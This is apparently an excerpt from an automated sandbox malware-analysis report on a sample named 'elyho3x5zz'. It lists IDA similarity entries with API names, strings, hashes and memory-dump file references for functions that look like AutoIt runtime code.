      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
      • String ID: @
      • API String ID: 3869813825-2766056989
      • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
      • Instruction ID: 6c6d538b62b5ec2d7c74eb19a358d6b87fab96854b92b6a39a7e71ca2235834e
      • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
      • Instruction Fuzzy Hash: FB81AE36A04A529AF700EF76D85166D73A4FB84B88F808171DE0EA7758DF38D845E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
      • API String ID: 222038402-1459072770
      • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
      • Instruction ID: 285c973cb1c5d7f2f676e7f004a28eac73756befc3081fe857ed7100e2e582e7
      • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
      • Instruction Fuzzy Hash: 2151BE2970D69266FA14FB16A5021B9A3A1AF85FD0FC04671EE0D47B96DF3CE501F720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
      • API String ID: 2091158083-3440237614
      • Opcode ID: e7cf14c8cb9fea28fae3cfa0ca1c8c9e213d5ab0a26eeea6c7821a3ea67fb674
      • Instruction ID: fec93c02a619ab0feb19c41988ecb8ab2255431c8bb60eb2d4fe550808994547
      • Opcode Fuzzy Hash: e7cf14c8cb9fea28fae3cfa0ca1c8c9e213d5ab0a26eeea6c7821a3ea67fb674
      • Instruction Fuzzy Hash: 3471603A618A82A6F710EB15E4467E9B720FBC4794FC00072EE4E47A99DF7CD149E750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: SendString$BuffCharDriveLowerType
      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
      • API String ID: 1600147383-4113822522
      • Opcode ID: b3332fb1be5ab1f23677351a9f9b0a3f5ed7b6727cd58e1410d094eeb12e78cd
      • Instruction ID: 6681615acd1bac7900835b5b80a978cf99d373f3c5bb97cc908db0bd0d0fe32f
      • Opcode Fuzzy Hash: b3332fb1be5ab1f23677351a9f9b0a3f5ed7b6727cd58e1410d094eeb12e78cd
      • Instruction Fuzzy Hash: 4281A22AB14A12A5FF10AB26D8522BCF3B1FBA4B94B944571CE0D87794DF3CD546E320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
      • String ID: .dll$.exe$.icl
      • API String ID: 258715311-1154884017
      • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
      • Instruction ID: b850927cd6d46cc4447c6ce33617ba418cc9147fcb09e0c65edcc184951e5faf
      • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
      • Instruction Fuzzy Hash: 4271173AA09B5296FB20AF21A4426B9A3A4FF84B94F840671ED1D877A4DF3CD544F310
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
      • String ID:
      • API String ID: 3840717409-0
      • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
      • Instruction ID: 1f9eff09c21af27c1d228026d087557f896aa73d2f8a742f67c82706efbcfb16
      • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
      • Instruction Fuzzy Hash: 32516A3AB18B419AFB14DF62E805A6D73A8FB88B94B904171EE1E83B14DF3DD405E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Variant$ClearInit
      • String ID: %4d%02d%02d%02d%02d%02d$Default
      • API String ID: 2610073882-3931177956
      • Opcode ID: c629d060036ee8cb33259b61b520dba21cc015254e6618a80cb5c351be3586fd
      • Instruction ID: f4153f09299b25d2cdf7f9b2f1f5945c8710e4b60905dd04665369b2f9675c71
      • Opcode Fuzzy Hash: c629d060036ee8cb33259b61b520dba21cc015254e6618a80cb5c351be3586fd
      • Instruction Fuzzy Hash: B30272BAA0D642A5FA54BB65D06617CE3A1FF84B80F8541B5CA0E47A94CF2CE950F320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
      • String ID: aut
      • API String ID: 130057722-3010740371
      • Opcode ID: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
      • Instruction ID: 295a9592ca2b53df24126a40cb1de3118d807b9251e16a97be066367fd47728d
      • Opcode Fuzzy Hash: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
      • Instruction Fuzzy Hash: 10C1A7766186C6A5FB24EF25E8412E9B361FB84788F804032EB4D47B99DF3CD205E710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$MessageSend$CreateDestroy$DesktopRect
      • String ID: tooltips_class32
      • API String ID: 2443926738-1918224756
      • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
      • Instruction ID: 281644a405013652c53fef1fe150da7dd09c9fe0fbff3d58d3a79484d2ede241
      • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
      • Instruction Fuzzy Hash: D791BC3AA08A859AFB50DF65E4417ACB3A1FB88B84F804076DE4D47B18DF3CE045E720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
      • String ID: *.*
      • API String ID: 1111067124-438819550
      • Opcode ID: 2df2e35037baf337eb2db51105f2de0ffed2215427f4fc3216daa8273d014621
      • Instruction ID: b88f93c57efcce692c6dfc7d1c2c8084c79d5c6d64d179549b97e14766acfe23
      • Opcode Fuzzy Hash: 2df2e35037baf337eb2db51105f2de0ffed2215427f4fc3216daa8273d014621
      • Instruction Fuzzy Hash: 3E71A07A618B8AA1EB10EF12E8421EEB371FB84B88F800071EE4D47765CF79E545E750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
      • String ID:
      • API String ID: 2598888154-3916222277
      • Opcode ID: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
      • Instruction ID: 2f7ee5c048f1858ef1493c5784368f64f0541757161fefa5d949cb5ddea7c8da
      • Opcode Fuzzy Hash: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
      • Instruction Fuzzy Hash: EB51777AB19641CFE750DF65E440AADB7B5F788B88F408125EE4A93B18CF38E415DB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
      • String ID: NULL Pointer assignment
      • API String ID: 2706829360-2785691316
      • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
      • Instruction ID: f89d616e78158e5d195fe82fd904d20423798e27d4ab9a8ad13e70e394ab023e
      • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
      • Instruction Fuzzy Hash: 05515026B15A129AFB40EF61D8866BCA770FBC4B88F804031EA0E87695DF39D485E350
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
      • String ID: *.*
      • API String ID: 4125642244-438819550
      • Opcode ID: 28f79fac5b48c1e4f3104e62abd9b7bad88d1373c61b83185a64a616cec24369
      • Instruction ID: 716d80bf90592968189d587b94360cf75fdf4f00fbdada373615a517b0abc9a8
      • Opcode Fuzzy Hash: 28f79fac5b48c1e4f3104e62abd9b7bad88d1373c61b83185a64a616cec24369
      • Instruction Fuzzy Hash: 5D81C16A618A8AA5FB14EF15D8466BDF3A0FB84B84FC40072EE4E47694DFB8D504F310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ItemMenu$Info$CheckCountRadioSleep
      • String ID: P
      • API String ID: 1460738036-3110715001
      • Opcode ID: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
      • Instruction ID: cf80d66d0b33b8889106c5e89021486186c1502f52b21d803027da1d64daea63
      • Opcode Fuzzy Hash: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
      • Instruction Fuzzy Hash: 7871152AE0C6A26AFB20FF2494072BDA765BBC0748FD54071DA4E47685CE7CE546F720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: LoadStringwprintf
      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
      • API String ID: 3297454147-3080491070
      • Opcode ID: 5fd285544855fb4b54be74cc94024578cbe44963d31b8940ee8fe07e7d93a8e5
      • Instruction ID: 1a26718014f0237b56c25144216542cac215563afb94eb2ef010a7653acc922a
      • Opcode Fuzzy Hash: 5fd285544855fb4b54be74cc94024578cbe44963d31b8940ee8fe07e7d93a8e5
      • Instruction Fuzzy Hash: D2615F6AB18A52B6FB00FB64E4525F8E360FB80744FC010B2EA4D53699DE7CE506E760
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: HandleLoadModuleString$Messagewprintf
      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
      • API String ID: 4051287042-2268648507
      • Opcode ID: 067dacd247e379e4f61376e400f4e94febefd672d0ac4a6975ea11c829ee5bb6
      • Instruction ID: 3d5f4d273cd89b062bba2ad5c7e3f452c56e2e269806ed58680f59c611e817bd
      • Opcode Fuzzy Hash: 067dacd247e379e4f61376e400f4e94febefd672d0ac4a6975ea11c829ee5bb6
      • Instruction Fuzzy Hash: 2D518E2AB18A52A5FB00FB64E8420FDA371FF94784BC001B2EA1D5369ADF7CD506E750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
      • String ID: BUTTON
      • API String ID: 3935177441-3405671355
      • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
      • Instruction ID: 13855c77daebdbc7ceb6d0ac033f729fc8fff5fceae63dfa17b9f3448183858a
      • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
      • Instruction Fuzzy Hash: EE31BD2CF09603A6F714BB20E857735A361AFC4744FC541B0E90E462A0CE2CE484B730
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$ItemMoveRect$Invalidate
      • String ID:
      • API String ID: 3096461208-0
      • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
      • Instruction ID: c143060f6e4e6b1163255bb902999fcb70182b828bffc0e8fe93709c2747b9f1
      • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
      • Instruction Fuzzy Hash: 24619076B042509BF718DB6AD845A6CB7A6B7C8B84F908179EE0D93F48DF38D9059B00
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: State$Async$Keyboard
      • String ID:
      • API String ID: 541375521-0
      • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
      • Instruction ID: d5d36023eca30a94b8ea44c84d2a28339d4cb01efc51592300a5cf7d7594bbf6
      • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
      • Instruction Fuzzy Hash: 3A712A1AA1C6D1A5FB35AB30D0022B9AB60EFC6B84FD801B9D68D03782CE5DD945F770
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
      • String ID: %s%u
      • API String ID: 1412819556-679674701
      • Opcode ID: 44ac92edb071f1514f787052a8c84010b0e78617ae0e472b0051bd7801e4bec2
      • Instruction ID: 0f59089d7bd8660915bf548727b9af58a96075d6a2af32f5e1cdf414f9a89a39
      • Opcode Fuzzy Hash: 44ac92edb071f1514f787052a8c84010b0e78617ae0e472b0051bd7801e4bec2
      • Instruction Fuzzy Hash: CFB1F37AB08692A6FB18EB25D8056F8B760FB84B84F800075DE1D47795DF3DE544EB20
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
